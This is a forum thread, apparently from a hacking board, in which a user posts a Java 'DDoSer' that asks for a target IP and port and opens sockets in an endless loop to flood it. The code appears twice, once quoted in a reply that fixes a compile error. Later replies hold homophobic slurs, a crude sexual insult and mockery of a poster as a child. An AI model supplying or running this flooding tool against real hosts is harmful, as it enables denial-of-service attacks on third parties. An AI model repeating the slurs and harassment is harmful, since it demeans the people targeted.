System79s Java DDoSer

Posts 110 of 10 · Page 1 of 1
System79s Java DDoSer
Welcome to my thread about my Java DDoSer.
Btw.. anyone who remembers me?

Code:
import java.io.*;
import java.net.*;
import java.util.Scanner;

public class DDoSer {
public String author = "System79";
public String date = "Sun Nov 25";

public static void main(String[] args) throws IOException {
Scanner scanner = new Scanner(System.in);
System.out.println("Please fill in the IP adress to flood:");
String ip = scanner.nextLine();
System.out.println("Please fill in the Port to flood:");
int port = scanner.nextInt();
System.out.println("Starting flood");
try {
while(true) {
new Socket(ip, port);
}
} catch (UnknownHostException e) {
System.err.println("Could not find: "ip);
System.exit(1);
}
}
}
}
If it gives any compile errors please tell me, did this from my head.
Quote Originally Posted by System79 View Post
Welcome to my thread about my Java DDoSer.
Btw.. anyone who remembers me?

Code:
import java.io.*;
import java.net.*;
import java.util.Scanner;

public class DDoSer {
public String author = "System79";
public String date = "Sun Nov 25";

public static void main(String[] args) throws IOException {
Scanner scanner = new Scanner(System.in);
System.out.println("Please fill in the IP adress to flood:");
String ip = scanner.nextLine();
System.out.println("Please fill in the Port to flood:");
int port = scanner.nextInt();
System.out.println("Starting flood");
try {
while(true) {
new Socket(ip, port);
}
} catch (UnknownHostException e) {
System.err.println("Could not find: "ip);
System.exit(1);
}
}
}
}
If it gives any compile errors please tell me, did this from my head.
Nobody likes you, but.........

System.err.println("Could not find: "ip);


should be

System.err.println("Could not find: " + ip);
Quote Originally Posted by arunforce View Post
Nobody likes you, but.........

System.err.println("Could not find: "ip);


should be

System.err.println("Could not find: " + ip);
I know but i went to eat so was about to edit it in later..
Hate you too btw <3
omg its that like 12 year old kid, we have a fag named mika thats about the same age as you, go be friends with him
Quote Originally Posted by System79 View Post
Hate you too btw <3
he wasn't kidding you know
SYSTEM :O YOU WHORE!!!!
Quote Originally Posted by iverson954360 View Post
omg its that like 12 year old kid, we have a fag named mika thats about the same age as you, go be friends with him
i stoped giving out mika a golden shower now he needs your help D:
Gourav, STFU && GTFO
god if you are going to spam for ur one post please do it in the topic where the hack is released
Posts 110 of 10 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?